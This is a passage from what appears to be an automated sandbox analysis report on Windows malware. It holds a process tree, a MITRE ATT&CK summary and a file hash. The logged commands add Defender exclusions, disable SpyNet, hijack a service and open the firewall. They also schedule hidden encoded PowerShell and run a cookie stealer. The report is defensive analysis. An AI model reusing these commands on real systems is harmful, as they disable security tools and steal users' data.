                                                                                                                                                                                  "C:\Users\Admin\Documents\Dw2nwDd41MYFu6D8uq49Jf8g.exe"
                                                                                                                                                                                  2⤵
                                                                                                                                                                                    PID:1160
                                                                                                                                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                                                                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                                                                                                                                                                      3⤵
                                                                                                                                                                                        PID:6928
                                                                                                                                                                                    • C:\Users\Admin\Documents\xLnMWaX5kyQIikW84ja45Sb3.exe
                                                                                                                                                                                      "C:\Users\Admin\Documents\xLnMWaX5kyQIikW84ja45Sb3.exe"
                                                                                                                                                                                      2⤵
                                                                                                                                                                                        PID:6424
                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\idsoikid.exe" C:\Windows\SysWOW64\htiznmqc\
                                                                                                                                                                                          3⤵
                                                                                                                                                                                            PID:6168
                                                                                                                                                                                          • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                            "C:\Windows\System32\sc.exe" config htiznmqc binPath= "C:\Windows\SysWOW64\htiznmqc\idsoikid.exe /d\"C:\Users\Admin\Documents\xLnMWaX5kyQIikW84ja45Sb3.exe\""
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:3704
                                                                                                                                                                                            • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                              "C:\Windows\System32\sc.exe" start htiznmqc
                                                                                                                                                                                              3⤵
                                                                                                                                                                                                PID:6312
                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\8728.bat" "
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                  PID:6612
                                                                                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                      PID:2232
                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 6424 -s 1168
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                    PID:5132
                                                                                                                                                                                                • C:\Users\Admin\Documents\AsqDaUOfqOUX_6nDTbG3owG6.exe
                                                                                                                                                                                                  "C:\Users\Admin\Documents\AsqDaUOfqOUX_6nDTbG3owG6.exe"
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                    PID:6408
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS4DB.tmp\Install.exe
                                                                                                                                                                                                      .\Install.exe
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                        PID:5820
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS431C.tmp\Install.exe
                                                                                                                                                                                                          .\Install.exe /S /site_id "525403"
                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                            PID:4656
                                                                                                                                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                              "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                PID:2992
                                                                                                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                  PID:1272
                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                  /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                  PID:5528
                                                                                                                                                                                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                      PID:5752
                                                                                                                                                                                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                        PID:7028
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                    "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                      PID:5516
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                        PID:3172
                                                                                                                                                                                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                            PID:4976
                                                                                                                                                                                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                              PID:1648
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                          schtasks /CREATE /TN "gNhdeCbQn" /SC once /ST 00:20:22 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                                          PID:5992
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                          schtasks /run /I /tn "gNhdeCbQn"
                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                            PID:6268
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                            schtasks /DELETE /F /TN "gNhdeCbQn"
                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                              PID:3340
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                              schtasks /CREATE /TN "booXbIzkEgfNdKvxAC" /SC once /ST 23:34:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\dufiWnQ.exe\" j6 /site_id 525403 /S" /V1 /F
                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                                                                                              PID:7116
                                                                                                                                                                                                                      • C:\Users\Admin\Documents\KzezzdNeoyKQSqkYJoHwN1Af.exe
                                                                                                                                                                                                                        "C:\Users\Admin\Documents\KzezzdNeoyKQSqkYJoHwN1Af.exe"
                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                          PID:6388
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c timeout 45
                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                              PID:6524
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                timeout 45
                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                                                                                                PID:5056
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Ftbxknprim.exe
                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\Ftbxknprim.exe"
                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                PID:6468
                                                                                                                                                                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                  PID:4764
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS88892D5D\jobiea_7.exe
                                                                                                                                                                                                                              jobiea_7.exe
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                              PID:768
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS88892D5D\jobiea_7.exe
                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7zS88892D5D\jobiea_7.exe
                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                PID:3948
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS88892D5D\jobiea_7.exe
                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7zS88892D5D\jobiea_7.exe
                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                PID:3760
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS88892D5D\jobiea_5.exe
                                                                                                                                                                                                                              jobiea_5.exe
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                              PID:3836
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS88892D5D\jobiea_4.exe
                                                                                                                                                                                                                              jobiea_4.exe
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                              PID:5080
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                PID:3564
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                PID:852
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS88892D5D\jobiea_3.exe
                                                                                                                                                                                                                              jobiea_3.exe
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                PID:3948
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 3048 -ip 3048
                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                  PID:3100
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 5320 -ip 5320
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                    PID:5888
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 5392 -ip 5392
                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                      PID:5304
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 5320 -ip 5320
                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                        PID:5916
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 5204 -ip 5204
                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                          PID:6716
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 6208 -ip 6208
                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                            PID:6700
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 5392 -ip 5392
                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                              PID:6960
                                                                                                                                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                PID:4936
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 5732 -ip 5732
                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                  PID:4836
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 5528 -ip 5528
                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                    PID:5284
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 5204 -ip 5204
                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                      PID:3724
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 5732 -ip 5732
                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                        PID:3892
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 4600 -ip 4600
                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                          PID:6176
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 3668 -ip 3668
                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                            PID:7032
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 5472 -ip 5472
                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                              PID:6716
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 5392 -ip 5392
                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                PID:7044
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\htiznmqc\orhgzbil.exe
                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\htiznmqc\orhgzbil.exe /d"C:\Users\Admin\Documents\UWCTD8a6dLcIHtKZQpRzxTAo.exe"
                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                  PID:7116
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /C move /Y "C:\Windows\TEMP\mdegizoh.exe" C:\Windows\SysWOW64\htiznmqc\
                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                      PID:5992
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                      "C:\Windows\System32\sc.exe" config htiznmqc binPath= "C:\Windows\SysWOW64\htiznmqc\mdegizoh.exe /d\"C:\Windows\SysWOW64\htiznmqc\orhgzbil.exe\""
                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                        PID:824
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                        "C:\Windows\System32\sc.exe" start htiznmqc
                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                          PID:5604
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                                          "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                            PID:4144
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 7116 -s 652
                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                            • Program crash
                                                                                                                                                                                                                                                                            PID:4356
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 5732 -ip 5732
                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                            PID:5812
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 6424 -ip 6424
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                              PID:6644
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 5392 -ip 5392
                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                              PID:5380
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 676 -p 5732 -ip 5732
                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                PID:2416
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 5192 -ip 5192
                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                  PID:5328
                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 5392 -ip 5392
                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                    PID:3700
                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 700 -p 7116 -ip 7116
                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                      PID:5476
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 5732 -ip 5732
                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                        PID:5476
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 5340 -ip 5340
                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                          PID:5992
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 5392 -ip 5392
                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                            PID:1388
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 5192 -ip 5192
                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                              PID:7128
                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 5732 -ip 5732
                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                PID:4844
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 5340 -ip 5340
                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                  PID:6932
                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 712 -p 5192 -ip 5192
                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                    PID:5692
                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 5392 -ip 5392
                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                      PID:4784
                                                                                                                                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                                                                                                                                                                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                        PID:5860
                                                                                                                                                                                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                                                          PID:5916
                                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                                                                                                                                                                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                          PID:6604
                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 736 -p 5340 -ip 5340
                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                            PID:1648
                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 676 -p 5392 -ip 5392
                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                              PID:6572

                                                                                                                                                                                                                                                                                                            Network

                                                                                                                                                                                                                                                                                                            MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                                                                                            Execution

                                                                                                                                                                                                                                                                                                            Scheduled Task

                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                            T1053

                                                                                                                                                                                                                                                                                                            Persistence

                                                                                                                                                                                                                                                                                                            Modify Existing Service

                                                                                                                                                                                                                                                                                                            2
                                                                                                                                                                                                                                                                                                            T1031

                                                                                                                                                                                                                                                                                                            New Service

                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                            T1050

                                                                                                                                                                                                                                                                                                            Scheduled Task

                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                            T1053

                                                                                                                                                                                                                                                                                                            Privilege Escalation

                                                                                                                                                                                                                                                                                                            New Service

                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                            T1050

                                                                                                                                                                                                                                                                                                            Scheduled Task

                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                            T1053

                                                                                                                                                                                                                                                                                                            Defense Evasion

                                                                                                                                                                                                                                                                                                            Modify Registry

                                                                                                                                                                                                                                                                                                            2
                                                                                                                                                                                                                                                                                                            T1112

                                                                                                                                                                                                                                                                                                            Disabling Security Tools

                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                            T1089

                                                                                                                                                                                                                                                                                                            Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                            T1497

                                                                                                                                                                                                                                                                                                            Install Root Certificate

                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                            T1130

                                                                                                                                                                                                                                                                                                            Credential Access

                                                                                                                                                                                                                                                                                                            Credentials in Files

                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                            T1081

                                                                                                                                                                                                                                                                                                            Discovery

                                                                                                                                                                                                                                                                                                            Query Registry

                                                                                                                                                                                                                                                                                                            5
                                                                                                                                                                                                                                                                                                            T1012

                                                                                                                                                                                                                                                                                                            Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                            T1497

                                                                                                                                                                                                                                                                                                            System Information Discovery

                                                                                                                                                                                                                                                                                                            6
                                                                                                                                                                                                                                                                                                            T1082

                                                                                                                                                                                                                                                                                                            Peripheral Device Discovery

                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                            T1120

                                                                                                                                                                                                                                                                                                            Process Discovery

                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                            T1057

                                                                                                                                                                                                                                                                                                            Collection

                                                                                                                                                                                                                                                                                                            Data from Local System

                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                            T1005

                                                                                                                                                                                                                                                                                                            Command and Control

                                                                                                                                                                                                                                                                                                            Web Service

                                                                                                                                                                                                                                                                                                            1
                                                                                                                                                                                                                                                                                                            T1102

                                                                                                                                                                                                                                                                                                            Replay Monitor

                                                                                                                                                                                                                                                                                                            Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                            Downloads

                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751
                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                              54e9306f95f32e50ccd58af19753d929

                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                              eab9457321f34d4dcf7d4a0ac83edc9131bf7c57

                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                              45f94dceb18a8f738a26da09ce4558995a4fe02b971882e8116fc9b59813bb72

                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                              8711a4d866f21cdf4d4e6131ec4cfaf6821d0d22b90946be8b5a09ab868af0270a89bc326f03b858f0361a83c11a1531b894dfd1945e4812ba429a7558791f4f

